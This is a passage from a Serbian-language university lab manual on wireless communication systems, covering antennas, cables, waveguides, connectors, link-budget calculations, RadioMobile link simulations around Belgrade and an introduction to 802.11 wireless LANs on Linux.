25 Бежични комуникациони системи Слика 1.17 : Дијаграм зрачења антене AIR-ANT2485P-R Види се да се део таласа простире и иза антене. Спецификација антене AIR-ANT2485P-R приказана је у табели 1.3. Појачање Поларизација H-plane E-plane Тип конектора Начин монтаже 8.5dBi Вертикална 66 степени 56 степени RP-TNC На зид Табела 1.3 : Техничка спецификација антене AIR-ANT2485P-R Yagi антена је усмерена антена коју карактерише јако добро фокусирање сигнала. Може се срести и под називом Yagi-Uda, јер је назив добила по својим конструкторима. Дијаграм зрачења ових антена има облик лептира што се може видети на слици Види се да се одређена количина сигнала преноси у правцу иза антене. 17

26 I Вежба Слика 1.18 : Дијаграм зрачења Yagi антене Једна од Yagi антена Cisco компаније је модел AIR-ANT1949. Ове антене обично се користе да обезбеде покривеност сигналом дугачких ходника и хала. Иако је антена запакована у цилиндар, она унутар кућишта има облик раније коришћених телевизијских антена. Разлози за овакав начин израде су естетски али и због физичке заштите антена. Код монтирања Yagi антена мора се обавезно обратити пажња на правац поларизације. На пример, код Cisco Yagi антена, црном тачком се означава део антене који треба да буде окренут ка поду. Слика 1.19 : Изглед антене AIR-ANT1949 Карактеристике антене AIR-ANT1949 дате су у табели 1.4. Појачање 13.5dBi Поларизација Вертикална H-plane 30 степени E-plane 25 степени Тип конектора RP-TNC Начин монтаже На зид/стуб Табела 1.4 : Техничке карактеристике антене AIR-ANT

27 Бежични комуникациони системи Параболичне рефлектујуће антене (слика 1.20) имају и до 100 пута већу снагу од штап антена које се обично користе код бежичних мрежних адаптера. Користе се за тачка-тачка везе и имају уско усмерен сигнал, тако да се захтева прецизно постављање. Cisco AIR-ANT3338 антена може се користити за раздаљине и до 40km и брзину преноса података 2Mb/s. За брзине од 54Mb/s удаљеност предајне и пријемне антене смањује се на максимално 8km. Покривеност терена сигналом Слика 1.20 : Параболична рефлектујућа антена Појачање Поларизација H-plane E-plane Тип конектора Начин монтаже 21dBi Вертикална 12 степени 12 степени RP-TNC На стуб Табела 1.5 : Техничке карактеристике параболичне антене Код омнидирекционих и секторских антена, које се најчешће користе на приступним тачкама, вертикалан угао зрачења може представљати проблем за клијенте који се налазе у близини антена. Наиме, из техничких спецификација антена можемо видети који су њихови углови зрачења и на основу тога израчунати простор око предајника који представља тзв. сиву зону. Сива зона је простор који није покривен сигналом или је у тој области сигнал слаб (слика 1.21). 19

28 I Вежба Слика 1.21 : Сива зона Ако претпоставимо да се антена налази на стубу висине 20m, а вертикални угао зрачења антене је 18, може се израчунати на ком растојању сигнал са антене стиже до површине тла користећи следећу једначину: = Ако у једначину уврстимо вредности из овог примера добија се да ће пун сигнал који антена емитује бити на тлу тек на растојању од око 126m од антене. Уместо омнидирекционе антене могу се користити секторске антене које је могуће усмерити ка тлу за одређени угао у односу на вертикалну осу и на тај начин усмерити сигнал (слика 1.22). 20

29 Бежични комуникациони системи Једначина за израчунавање сиве зоне је: Слика 1.22 : Усмеравање антене ка тлу = ( + ) Претпоставимо да је додатни угао за који је усмерена антена ка тлу 15. Резултат прорачуна у овом случају показује да ако се антена усмери ка тлу за 15 сива зона се смањује на 45m. 1.5 Каблови Коаксијални каблови најчешће се користе за пренос сигнала чије су фреквенције веће од HF (3MHz 30MHz). Коаксијални кабл састоји се од језгра (проводника), омотача (диелектрик), металног омотача који обухвата цео диелектрик и спољног заштитног омотача (слика 1.23) Слика 1.23 : Попречни пресек коаксијалног кабла 21

30 I Вежба Проводник преноси сигнал. Изолатор спречава било какав контакт проводника и заштитне фолије (или мрежице). Заштитна фолија понаша се као Фарадејев кавез и отклања утицај спољашњих сигнала. Важно је да се заштитна фолија уземљи. У супротном, понашаће се као пријемник (антена) и имаће супротан ефекат. Сигнали на вишим фреквенцијама преносе се дуж саме површине проводника тако да што је веће језгро проводника, сигнал се боље преноси. Ова појава назива се површински ефект 11. Сваки кабл, ма колико савршен био, има своје слабљење које се изражава у децибелима по метру дужине кабла (db/m). Стопа слабљења представља функцију фреквенције сигнала и карактеристика самог кабла. Како се повећава фреквенција сигнала, повећава се и слабљење. Очигледно, да би се слабљење свело на минимум, требало би да користимо што краће и што квалитетније каблове. При избору каблова, који служе за повезивање уређаја који чине један систем за микроталасни пренос, треба имати у виду неколико практичних правила. То су: Краће боље. Прво правило је да сегмент кабла који се инсталира буде што краћи. Губитак снаге није линеаран, тако да двострука дужина кабла значи да ће се изгубити много више од двоструке снаге. Најбоље решење је да се предајник постави што је могуће ближе антени, чак и када то значи да се постави на торањ. Јефтиније лошије. Новац уложен у куповину квалитетног кабла није промашена инвестиција. Јефтини каблови могу да се користе за ниже фреквенције (30MHz 300MHz). Микроталаси захтевају најквалитетније каблове. Треба избегавати тип кабла RG 58. Ови каблови су превасходно намењени за етернет умрежавање, CB12 (радио за кратка растојања, нпр. токи-воки) и VHF радио. Треба избегавати и тип кабла RG 213. Намењен је за CB и HF радио. Кабл RG-213 има велико подужно слабљење. Најбољи избор био би Heliax (такође познат и као Foam ) кабл, за повезивање предајника и антене. Ако Heliax кабл (слика 1.24а) није доступан, треба користити најбоље рангирани LMR кабл. Каблови LMR 400 (слика 1.24б) и LMR 600 најчешће су коришћене замене за Heliax каблове. Слика 1.24 : а) Heliax тип кабла б)lmr 400 тип кабла 11 Skin effect 12 Citizens' Bandradio 22

31 Бежични комуникациони системи Ако постоји могућност, пожељно је користити каблове са фабричким завршецима пошто су тестирани. 1.6 Таласоводи Таласоводи су цеви, диелектрични цилиндри или проводници пресвучени диелектриком, кроз које се могу простирати електромагнетни таласи. За таласоводе у облику цеви (шупљи таласоводи), испуњене ваздухом, губици у диелектрику су занемарљиво мали. Највећа снага која се може преносити таласоводом ограничена је пробојом диелектрика у таласоводу. За разлику од проводника (коаксијалних каблова), код шупљих таласовода загревање проводника није критично јер се он налази са спољашње стране и добро се хлади. Електромагнетно поље се простире кроз таласовод тако што се одбија о унутрашње зидове таласовода, који се сматрају савршеним проводницима. Осе једног правоугаоног таласовода дате су на слици Слика 1.25 : Осе таласовода Постоји неограничен број комбинација (модела) како електрично и магнетно поље могу да се распореде у таласоводу. Модели могу да се поделе у две групе. Код прве групе, ТМ (TransverseMagnetic), магнетно поље је попречно у односу на смер простирања, а делови електричног поља су у смеру простирања сигнала. Код друге групе, ТЕ (TransverseElectric), електрично поље је попречно у односу на смер простирања, али делови магнетног поља су у смеру простирања сигнала. Модели се обележавају као нпр. ТЕ 10, ТМ 11, итд. Постоји један модел, доминантни модел, за најнижу фреквенцију која може да се преноси. Код правоугаоног таласовода критична је Х величина (дуж Х осе). Ова величина мора да буде већа од λ/2 најниже фреквенције која ће бити преношена. У пракси, величина Y једнака је половини величине Х, да би се избегла могућност преноса за фреквенције мање од доминантног модела. Облик попречног пресека не мора обавезно бити правоугаоног облика. Прелази између коаксијалних каблова и таласовода могу се поделити на две групе капацитивне (електричне) и индуктивне (магнетске). Основни облик капацитивне спреге је кратка жица (антеница или сонда) која представља продужетак унутрашњег проводника коаксијалног кабла, а спољашњи проводник се везује за зид таласовода. Индуктивна спрега је у облику петљице која је везана између унутрашњег проводника коаксијалног вода и зида таласовода. 23

32 I Вежба Слика 1.26 : Прелаз између коаксијалног кабла и таласовода 1.7 Конектори и адаптери Конектори служе за повезивање каблова са другим кабловимаа или за повезивање са осталим компонентама бежичне мреже, као што су антена, предајник итд. Постоји велики број различитих врста конектора, за различите врсте уређаја и каблова. Од велике је важности изабрати одговарајући конектор за део мреже који желите да спојите. У наставку текстаа биће описани неки од њих. BNC конектор развијен је раних 40-тих година прошлог века. BNC је скраћеница од Bayonet Neill Concelman, имена људи који су га изумели Paul Neillandd и Carl Concelman. Сматра се конектором за брзу монтажу и демонтажу. BNC је погодан за терминацију танких коаксијалних кабловаа (од RG 58 до RG-179 и RG-316). Има задовољавајуће перформансеп за пренос сигнала до неколико GHz. Ови конектори најчешће се могу видети код опреме за тестирање као и у старим локалним рачунарским мрежама, када је био популаран 10Base2 коаксијални етернет. На слици приказан је изглед BNC конектора. Слика 1.27 : BNC конектори TNC конектор такође су изумели Neill и Concelman. Овај конектор представља модификовани BNC конектор са навојем. Пошто навој обезбеђује бољу повезаност елемената, TNC конектори имају задовољавајуће перформансе у преносу сигнала наа фреквенцијама до 12GHz. На слици 1.28 приказан је изглед TNC конектора. TNC је скраћеница од Threaded Neill Concelman. 24

33 Бежични комуникациони системи Слика 1.28 : TNC конектори Тип 'N' (ознака N за Neill, такође и 'Navy'- морнарица) ови конектори настали су током Другог светског рата. Имају задовољавајуће карактеристике на фреквенцијама чак и до 18 GHz. Ово су изузетно компактни и издржљиви конектори. На слици 1.29 приказани су конектори 'N' типа. Слика 1.29 : Конектори N типа SMA конектори развијени су раних 60-тих година прошлог века. SMA је скраћено од SubMiniature version A. Ови конектори изузетно су малих димензија и омогућавају задовољавајуће перформансе на фреквенцијама до 18 GHz. На слици 1.30 приказани су SMA конектори. Слика 1.30 : SMA конектори SMB - скраћено од SubMiniature version B. Мањи су и имају другачији дизајн од верзије А. Омогућавају задовољавајуће перформансе на фреквенцијама до 4 GHz. На слици 1.31 приказани су SMB конектори. 25

34 I Вежба Слика 1.31 : SMB конектори MCX развијени су раних 80-тих година прошлог века. Имају исти пречник унутрашњег дела који остварује контакт као и SMВ али им је спољашњи део за 30% мањи. Омогућавају задовољавајуће перформансе на фреквенцијама до 6 GHz. На слици 1.32 приказани су MCX конектори. Називају се још и пигтејл (енг. pigtail), када се користе за повезивање бежичних картица са антенама. Слика 1.32 : MCX конектори 1.8 Прорачун буџета бежичног линка са оптичком видљивошћу Буџет линка представља суму свих добитака и слабљења сигнала од предајника до пријемника и може се представити поједностављеном формулом: Примљена снага (dbm) = Снага предајника (dbm) + Добици (db) Слабљења (db) Код прорачуна буџета линка морају се узети у обзир: снага предајника, губици снаге сигнала у кабловима, губици снаге сигнала у конекторима, добици снаге услед појачања антена, губици снаге услед пропагације кроз слободан простор, осетљивост пријемника. Ако познајемо вредности наведених фактора, можемо на веома прост начин израчунати колики ће бити укупни губици сигнала на путу од предајника до пријемника следећом формулом: где је: P RX = P TX + G TX - L TX - L FS - L M + G RX - L RX P RX снага сигнала на пријему (dbm), P TX снага сигнала предајника (dbm), G TX појачање антене предајника (dbi), L TX губици на предајној страни (губици у конекторима, кабловима) (db), L FS губици снаге услед пропагације кроз слободан простор (db), 26

35 Бежични комуникациони системи L M разни губици настали због фединга, разлике у поларизацији антена, итд... (db), G RX појачање антена на пријему (dbi), L RX губици на пријемној страни (губици у конекторима, кабловима) (db). Формула по којој се могу прорачунати губици снаге сигнала услед пропагације кроз слободан простор је: где је: = 20 log 4π L губитак снаге услед пропагације, λ таласна дужина, d раздаљина између предајника и пријемника. Из ове формуле се могу извести алтернативне формуле које се могу примењивати у зависности од јединица које се користе за мерење раздаљине: = 32,45 [db] + 20 log( [MHz]) +20log( [km]) = 27,55 [db] +20log( [MHz]) +20log( [m]) = 36,6 [db] +20log( [MHz]) +20log( [mile]) Бежични линк биће употребљив ако ниво снаге сигнала на пријему буде већи од нивоа осетљивости самог пријемника. Разлика између снаге сигнала на пријему и нивоа осетљивости пријемника назива се маргина линка. Маргина линка (db) = Снага сигнала на пријему (dbm) Осетљивост пријемника (dbm) Потребно је да маргина линка буде што већа због промене временских услова који могу повећати слабљење сигнала приликом пропагације. У табели 1.6 приказан је Рејлијев модел који приказује однос измећу маргине линка и доступности линка у времену. Временска доступност линка (%) Маргина линка (db) , , , Табела 1.6 : Рејлијев модел У случају да се опрема на предајној и опрема на пријемној страни доста разлукују у техничким карактеристикама, потребно је извршити прорачун линка за оба смера. Прорачун са слабијим резултатима треба узети као референтну вредност. Овакав прорачун линка је теоретски и служи као референца за процену да ли је линк уопште могућ и које техничке карактеристике мора да задовољи опрема коју би користили. 27

36 I Вежба Пример: Анализа бежичног линка Потребно је извршити анализу линка са следећим карактеристикама: Раздаљина: 5 km Фреквенција: 5,8 GHz Тип линка: Тачка-тачка Радио-систем: На обе стране је идентичан систем (предајна снага 100 mw, осетљивост пријемника - 88 dbm, појачање антене 18 dbi, слабљење на кабловима и конекторима 2 db) Први корак је да снагу предајника од 100mW претворимо у децибеле, што износи 20 dbm. Губитке који настају услед пропагације кроз слободан простор можемо израчунати формулом: = 32, log(5,8) +20log(5) = db Сада имамо довољно информација да извршимо прорачун очекиване снаге сигнала на пријему: P RX = P TX + G TX - L TX - L FS + G RX - L RX 20 dbm + 18 dbi - 2 db -121,67 db + 18 dbi - 2 db = -69,8 dbm На основу резултата можемо прорачунати маргину линка, која износи 18,2 db. На основу Рејлијевог модела можемо закључити да ће бежични линк бити доступан 99% укупног времена коришћења, што је у нашем случају прихватљиво. Активност 1: Прорачун буџета бежичног линка Прорачунати да ли је могуће направити бежични линк између два уређаја који се налазе на раздаљини од 50km. Модел уређаја који се користи је MikroTik RBSXTG-5HnD. Техничке карактеристике уређаја преузети са Интернета. Потребно је да линк буде доступан 99% од укупног времена. 28

37 II ВЕЖБА УПОТРЕБА АПЛИКАЦИЈА ЗА ПРОРАЧУН И СИМУЛАЦИЈУ БЕЖИЧНИХ КОМУНИКАЦИОНИХ СИСТЕМА Циљ вежбе је упознавање студената са апликацијама које се користе за прорачун и симулацију бежичних комуникационих система. Коришћењем ових апликација студентима се омогућава да заокруже процес учења уз помоћ практичних примера и на тај начин боље схвате теоретске концепте који су се обрађивали у претходној вежби. У овој вежби биће приказана употреба RadioMobile програма кроз примере симулације тачка-тачка бежичног линка и симулације прорачуна покривености територије радио-сигналом.

38 II Вежба 2. Употреба апликација за прорачун и симулацију бежичних комуникационих система 2.1 Теоретска основа У првој вежби обрађен је теоријски прорачун буџета бежичног линка, и закључено је да информације које нам такав прорачун пружа нису детаљне. У случајевима када су нам потребни детаљнији и прецизнији прорачуни неопходно је користити апликације које служе за предикцију перформанси радио-система. Овакве специјализоване апликације омогућавају нам симулирање пропагације радио-сигнала, планирање ћелија, прорачун покривености територије радиосигналом, итд. Ове апликације користе географске податке о рељефу терена као и различите моделе пропагације радио-сигнала, и на основу тих података могу извршити прорачуне са прецизним резултатима. Професионалне апликације оваквог типа веома су скупе тако да ћемо у овој вежби користити бесплатан програм RadioMobile. Иако је бесплатан, програм пружа довољно детаља при прорачуну бежичних система па представља добру основу за упознавање са апликацијама овог типа. Аутор програма је француз Roger Coudé, а сам програм и упутство за инсталацију може се наћи на официјалном сајту 13. RadioMobile постоји и у online верзији програма који не захтева инсталацију на рачунар, али ова верзија не подржава све опције као оригинална верзија програма. Неке од могућности које нам пружа RadioMobile су следеће: Омогућава рад са сигналима у распону од 20MHz до 20GHz. Програм користи Longley-Rice пропагациони модел који је развијен од стране ITS 14 -а. Омогућава коришћење велике базе података из географских информационих система. Ти подаци могу се комбиновати са топографским картама или сателитским фотографијама терена. Постоји велики број параметара који се могу подешавати (снаге предајника, појачање антена, осетљивост пријемника, атмосферски услови, итд...). Програм подржава неколико симулација уз помоћ којих се могу креирати и тестирати различите топологије радио-система (симулације тачка-тачка линкова, симулације распрострањености бежичног сигнала, итд...). У овој вежби биће приказана употреба RadioMobile програма кроз два примера. Први пример обухватиће кораке неопходне да би се извела симулација једног тачка-тачка бежичног линка. Други пример приказаће прорачун покривености територије радио-сигналом International Telecommunications Society 30

39 Бежични комуникациони системи 2.2 Пример прорачуна тачка-тачка бежичног линка У примеру ће бити приказана симулација бежичног линка измећу радио-система који ће се налазити на водоторњу на Кошутњаку и радио-система који се налази на Београдској арени. Да би се извела ова симулација неопходно је извршити следеће кораке: 1. преузимање географских података о конфигурацији терена, 2. постављање топографске карте или сателитских фотографија терена, 3. креирање модела мреже и топологије жељеног типа над којом ће се вршити симулација, 4. конфигурација техничких карактеристика радио-система, 5. креирање локација на којима ће да се налазе радио-системи, 6. постављање радио-система на одабране локације, 7. покретање симулације и преглед резултата. Преузимање географских података Најлакши начин за преузимање географских података је да препустимо RadioMobile програму да самостално преузме потребне податке са Интернета. Програм може да користи податке о конфигурацији терена у неколико формата: SRTM 15, DTED 16, GTOPO30 17, итд... Први корак је одабир локације за коју ће програм преузети одговарајуће податке о конфигурацији терена са Интернета (File/Map Properties). Слика 2.1 : Одабир локације 15 Shuttle Radar Topography Mission 16 Digital Terrain Elevation Data 17 Global 30 Arc Second Elevation Data Set 31

40 II Вежба Жељена локација може се одабрати уношењем координата (географске ширине и дужине), одабиром града или уз помоћ курсора. У овом примеру бира се град Београд (слика 2.1), поставља се резолуција слике на 4000х4000 пиксела, и област од 20 километара коју ће слика приказивати (слика 2.2). Слика 2.2 : Постављање параметара слике Након ових подешавања потребно је кликнути на дугме Extract како би програму дали наредбу да прикупи потребне податке са Интернета и прикаже слику која приказује рељефне податке о терену (слика 2.3). Сада је за одабрану локацију програм учитао све неопходне географске податке. 32

41 Бежични комуникациони системи Постављање карте Слика 2.3 : Изглед добијене слике са информацијама о рељефу терена Како би се лакше оријентисали потребно је на ову карту са рељефним подацима додати нпр. саобраћајну карту или сателитске фотографије. За генерисање ових карата могу се користити Google Maps, Yahoo Maps и остали светски познати сервиси који пружају овакву врсту информација. Да би одабрали жељену карту потребно је одабрати опцију Edit/Merge pictures. У овом примеру определићемо се за Google Maps и користићемо саобраћајну карту (слика 2.4) 33

42 II Вежба Слика 2.4 : Изглед прозора Merge pictures У оквиру дијалога Operation, у десном делу прозора, бирамо како ће се наша нова мапа уклопити са старом. На слици 2.5 можемо видети слику која је генерисана након што смо кликнули на дугме Draw. Сада је програм спојио мапу града са рељефним подацима. Слика 2.5 : Изглед спојене рељефне карте са саобраћајном картом 34

43 Бежични комуникациони системи Креирање мреже и топологије Када смо прикупили неопходне географске податке потребно је креирати модел мреже над којом ћемо вршити симулације и одредити њену топологију. У прозору за подешавање параметара мреже (File/Network properties/parameters) можемо подесити име модела мреже (обично се ставља неко асоцијативно име), фреквенцију радио-система који ће се користити, поларизацију антена и параметре везане за климатске услове и карактеристике терена. У овом примеру модел мреже назваћемо g-TT, јер ће овај модел представљати тачка-тачка везу између два бежична уређаја која подржавају g стандард. Фреквентни опсег који ће се употребљавати је у распону од 2400MHz до 2495MHz (слика 2.6). Слика 2.6 : Подешавање мрежних параметара У овом примеру користићемо топологију звезде (File/Network properties/topology), где ћемо имати један главни уређај (master), а остали уређаји (slave) биће повезани на главни уређај (клијенти). Мрежа ће се користити за пренос података (слика 2.7). 35

44 II Вежба Слика 2.7 : Подешавање топологије мреже Конфигурација техничких карактеристика радио-система Следећи корак је креирање радио-система (File/Network properties/system) које ћемо користити у симулацији. У овом примеру креираћемо два радио-система. Један ће се налазити на водоторњу на Кошутњаку а други ће се налазити на Београдској арени. У случају да се у некој симулацији користе радио-системи истих техничких карактеристика, потребно би било креирати само један модел таквог система који би употребили на више локација. Радио-систем који ће се налазити на водоторњу назваћемо Kosutnjak-Master, и имаће техничке карактеристике приказане на слици

45 Бежични комуникациони системи Слика 2.8 : Подешавање параметара радио-система Потребно је на идентичан начин направити још један систем са следећим карактеристикама: Име система: Arena-Klijent Предајна снага: 100mW Oсетљивост пријемника: -89dBm Губици у кабловима и конекторима: 0,4dB Тип антене: Yagi Појачање антене: 26dBi Висина антене изнад земље: 25m Креирање локација Потребно је одредити локације на којима ћемо поставити креиране радио-системе. Локацију можемо поставити уношењем тачних координата, или ћемо једноставно одабрати курсором жељено место на карти и програм ће аутоматски одредити координате. Прво ћемо унети локацију водоторња на Кошутњаку (File/Unit properties), локацију ћемо назвати Toranj-Kosutnjak. На Интернету можемо пронаћи информацију о координатама торња и затим ћемо те податке унети у програм (слика 2.9). 37

46 II Вежба Слика 2.9 : Креирање локације и уношење координата Затим је потребно на исти начин креирати и локацију са координатама Београдске арене и назвати је Arena. Постављање радио-система на одабране локације Када смо завршили са креирањем радио-система и са одабиром локацијa, потребно је радиосистемe поставити на жељене локације (File/Network properties/membership). Радио-систем са именом Kosutnjak-Master поставићемо на локацију Toranj-Kosutnjak, док ћемо радио-систем са именом Arena-Klijent поставити на локацију под називом Arena (слика 2.10). 38

47 Бежични комуникациони системи Слика 2.10 : Постављање радио-система на одговарајућу локацију Радио-систем на Кошутњаку треба да има улогу мастера, док систем на Београдској арени треба да има улогу клијента (slave). Пошто радио-систем на Арени има усмерену антену у доњем десном углу на слици 2.10 приметићете секцију Antenna direction у којој треба усмерити антену радио-система сa Београдске арене према локацији на Кошутњаку. Након одабира локације на коју желимо да усмеримо антену, програм аутоматски прорачунава азимут и вертикални угао нагиба антене, што је од изузетне користи код физичке монтаже радио-система и антена. Покретање симулације и преглед резултата Ако су сви наведени кораци завршени можемо покренути симулацију (Tools/Radio Link). Резултат симулације је приказан на слици

48 II Вежба Слика 2.11 : Резултат симулације У прозору који приказује резултат симулације можемо видети да је линк могуће остварити пошто је приказан зеленом бојом. Елипсе беле боје око линије видљивости представљају Френелове зоне. За вежбу можете мењати фреквенцију радио-система како бисте видели утицај фреквенције сигнала на Френелове зоне, што је теоретски објашњено у првој вежби. Симулација нам пружа још неколико података: Azimuth Elev. angle Obstruction Worst Fresnel Distance PathLoss db E field RX level RX Relative Азимут радио-линка од предајника ка пријемнику Хоризонтални угао антене у односу на земљу Удаљеност између предајника и препреке Удаљеност Френелове зоне од земље Раздаљина између предајника и пријемника Губици снаге сигнала на путањи Јачина електричног поља на пријемнику Снага сигнала на пријемнику Маргина линка Резултат симулације можемо извести у програму Google Earth (Edit/Export to/google Earth), где можемо видети линк у три димензије као и резултате симулације (слика 2.12). 40

49 Бежични комуникациони системи Слика 2.12 : Преглед резултата симулације у програму Google Earth 2.3 Прорачун покривености територије радио-сигналом У овом примеру биће приказана симулација која врши прорачун покривености територије радио-сигналом. У симулацији се може користити један предајник или више предајника што је корисно за планирање ћелијске бежичне мреже. За овај пример искористићемо радио-систем Arena-Klijent који смо направили у првом примеру, једино ћемо променити појачање антене овог система са 26dBi на 19dBi како би лакше уочили дијаграм зрачења антене. Користићемо симулацију која врши прорачун покривености сигналом за само један предајник (Tools/Radio coverage/single polar). Доступно је неколико опција за подешавање симулације (слика 2.13). Потребно је одабрати централни радио-систем за који ће симулација вршити прорачун, у овом примеру то је радиосистем Arena-Klijent. Можемо затим одабрати смер прорачуна (од предајника ка пријемнику, од пријемника ка предајнику или оба случаја), такође можемо одабрати стил исцртавања области која је покривена радио-сигналом. Могуће је подесити распон снаге сигнала коју желимо да узмемо у обзир приликом прорачуна. Можемо подесити површину земљишта на коме ће се вршити прорачун као и усмереност и тип антене који користимо. 41

50 II Вежба Слика 2.13 : Подешавање параметара симулације Након покретања симулације (кликом на дугме Draw), добија се слика 2.13 на којој можемо видети области које ће сигнал овог радио-предајника покривати. Коришћена је Yagi антена, што се може приметити и по дијаграму зрачења сигнала. 42

51 Бежични комуникациони системи Слика 2.14 : Резултат симулације Активност 1: Симулација линка Авала-Фрушка гора Помоћу програма Radio Mobile пројектовати тачка-тачка линк фреквенције 2.4GHz између Фрушке горе и торња на Авали. За град у Radio Mobile-у изаберите Београд.Ширину мапе поставите на 100km, резолуцију поставите на 4000x4000 пиксела. Претпоставља се да је антена на Фрушкој гори на торању висине 50m. На Авали поставите антену на Авалском торњу. Од уређаја су на располагању: Антена: TP-Link TA на обе стране Примопредајници: TL-WA801ND на обе стране Губици на линији су 0.5dB Да ли је могуће успоставити везу између ове две тачке? У којим условима? Шта треба променити како би се линк побољшао, ако је потребно? 43

52 II Вежба Активност 2: Симулација другог линка Авала-Фрушка гора Помоћу програма Radio Mobile пројектовати тачка-тачка линк фреквенције 2.4GHz између Фрушке горе и торња на Авали. За град у Radio Mobile-у изаберите Београд.Ширину мапе поставите на 100km, резолуцију поставите на 4000x4000 пиксела. Претпоставља се да је антена на Фрушкој Гори на торању висине 20m. На Авали поставите антену на Авалском торњу. Од уређаја су на располагању: Антене: TP-Link TA на Авали TL-ANT2415D - на Фрушкој гори Примопредајници: TL-WA801ND на обе стране Губици на линији су 1.5dB Да ли је могуће успоставити везу између ове две тачке? У којим условима? Шта треба променити како би се линк побољшао, ако је потребно? 44

53 III ВЕЖБА ОПШТИ ПРЕГЛЕД ЛОКАЛНИХ БЕЖИЧНИХ МРЕЖА И АНАЛИЗА МРЕЖНОГ САОБРАЋАЈА Циљ вежбе је упознавање студената са основама стандарда за бежично простирање сигнала у локалној рачунарској мрежи. Вежба обухвата теоријску основу као и практичне задатке које сваки студент извршава на свом рачунару. На крају вежбе студенти ће бити у могућности да препознају различите типове мрежа на основу њихових параметара, као и да се повежу на исте.

54 III Вежба 3. Општи преглед локалних бежичних мрежа и анализа мрежног саобраћаја 3.1 Општи преглед бежичних локалних рачунарских мрежа Бежичне локалне рачунарске мреже дефинисане су стандардом IЕЕЕ Користе се радио-таласи у нелиценцираном опсегу од 2,4GHz и 5GHz. Како би се омогућиле брзине преноса података које се очекују од локалних рачунарских мрежа користе се сложене технике кодирања и модулације, као и различити начини употребе канала унутар овог опсега. Оригинални, данас застарели, стандард је описивао пренос података брзинама од 1Mb/s и 2Mb/s уз двa могућа начина модулације FHSS (Frequency Hoping Spread Spectrum) и DSSS (Direct Sequence Spread Spectrum). Оригинални стандард је прошириван побољшањима која су уз сложеније механизме модулације омогућавала веће брзине преноса: а, који омогућава брзине до 54 Mb/s, при чему се користи OFDM модулација у фреквентном опсегу од 5GHz (5,47GHz - 5,725GHz). У време настанка овог побољшања овај опсег је био нелиценциран само у САД, па је и данас ређа употреба овог стандарда у Европи b, који је омогућавао брзине до 11 Mb/s, дакле мање него а али је користио оригинални 2,4GHz опсег, па је овај стандард постао популаран у Европи. Користи се DSSS модулација g, који омогућава брзине преноса до 54Mb/s, користећи OFDM модулацију у 2,4GHz опсегу. Оваква опрема је компатибилна са b опремом и често се ознава са b/g n, омогућава брзине до 600 Mb/s. Ово побољшање је усвојено септембра године. Основне одлике n стандарда јесу инкорпорација MIMO (multiple-input and multiple-output) технологије, употреба фреквенције од 2,4GHz, али и 5GHz, као и коришћење такозваног Channel Bonding-а, односно груписање два суседна радио-канала како би се пропусни опсег проширио са 20MHz нa 40MHz. Треба приметити да је комуникација због природе медијума полудуплекс типа, као и да сам протокол има доста додатног саобраћаја, тако да је реални пропусни опсег мањи. Употреба нелиценцираног опсега значи да не постоји начин да се дата фреквенција резервише за једног корисника, па је уобичајено да у бежичној мрежи постоје сметње од суседних бежичних мрежа или друге опреме која ради на истом опсегу. 46

55 Бежични комуникациони системи 3.2 Подела опсега на канале Код опреме која користи b или g стандард, расположиви опсег фреквенција је подељен на 14 канала ширине 22MHz. Национална регулатива појединих земаља одређује који од канала су расположиви за употребу. У САД се користе првих 11 канала, док је у Европи дозвољено 13 канала. У Јапану је дозвољена употреба и 14. канала. Канали се обично означавају са централном фреквенцијом канала. Разлика између средина суседних канала је 5MHz. Ово значи да се дефинисани канали преклапају, тако да предајници који користе суседне канале не би требало да буду један другом у домету јер ће сигнали из једног канала представљати шум на другом каналу. Уколико је потребно поставити више предајника у непосредној близини морају се користити канали који су најмање 5 канала одвојени. На пример у САД, то су канали 1, 6, 11. Слика 3.1 : Расподела канала у опсегу 2,4Ghz 3.3 Преглед бежичних мрежних интерфејса под оперативним системом Linux Назив бежичног мрежног адаптера под Linux оперативним системом може се разликовати у зависности од управљачког програма (драјвера) који се користи. Aдаптер би могао да се прикаже као да је у питању етернет адаптер (ethx), или под називом који зависи од употребљеног мрежног адаптера (на пример ath0 за бежичне мрежне адаптере са Atheros скупом чипова). Код већине бежичних мрежних адаптера део функционалности који се назива MLME (MAC sublayer management entity) је имплементиран у софтверу, па је и начин управљања адаптером зависио од употребљеног управљачког програма. Однедавно у оквиру Linux оперативног система постоји заједнички API за писање управљачких програма зa бежичне мрежне адаптере, под називом mac80211, као и за управљање бежичним мрежним адаптерима, под називом cfg Идеја је да се и бежичним мрежним адаптерима управља на униформан начин без обзира на произвођача. Адаптери који користе овакве управљачке програме приказују се као wlanx. Како би нам оперативни систем приказао бежичне мрежне адаптере, односно који мрежни адаптери подржавају проширења за управљање бежичним адаптерима треба: Отворити терминалску конзолу: Програми/Алати: Терминал Укуцати: iwconfig Уочити информације: 47

56 III Вежба Како је означен бежични адаптер? Који стандард подржава адаптер ( IEEE802.11?). Које су подржане брзине преноса? На којој фреквенцији тренутно ради адаптер? Можемо погледати листу фреквенција које адаптер подржава. У терминалском прозору укуцати: iwlist channel Уочити следеће информације: Колико канала подржава адаптер? Да ли подржава канале који се не користе у САД? На ком каналу је тренутно? У зависности од управљачког програма могуће је подесити регулаторни домен, односно дозвољене канале за употребу. 3.4 Архитектура бежичних локалних рачунарских мрежа И слој везе података, као и логичке топологије бежичних мрежа знатно се разликују од уобичајеног Eтернета. Као елементи аритектуре наводе се BSS (Basic Service Set) - основни скуп услуга који представља област унутар које станице могу да комуницирају користећи бежични медијум. Физичка ограничења медијума одређују област коју покрива BSS. Физичка ограничења медијума могу се превазићи повезивањем неколико различитих основних скупова услуга неким другим медијумом (најчешће жичним, али не обавезно) у проширени скуп услуга (Extended Service Set). Компонента архитектуре која омогућава ово повезивање назива се дистрибуциони систем (DS). Тачно једна станица у сваком основном скупу услуга је веза између осталих станица у скупу и дистрибуционог система. То се на пример може постићи тако што таква станица има поред бежичног још и етернет адаптер, уколико је DS имплементиран као етернет мрежа. Оваква станица има улогу приступне тачке (Access Point). Ова станица има централну улогу у логичкој топологији свог скупа услуга и представља логички концентратор за комуникацију унутар свог скупа услуга. Сав саобраћај унутар скупа одвија се преко приступне тачке. Осим тога ова станица емитује посебне управљачке рамове података који имају циљ да обавесте о постојању скупа услуга, расположивим брзинама унутар скупа, као и да врше синхронизовање часовника осталих станица у скупу. Бежични адаптер овакве станице је у посебном режиму рада. Са друге стране, бежични адаптери осталих станица су у управљаном начину рада (Managed) јер је нека друга станица задужена за слање оваквих управљачких рамова и управља параметрима и чланством у скупу услуга. Уколико циљ рада приступне тачке није да свој скуп услуга путем дистрибуционог система повеже са другим скуповима 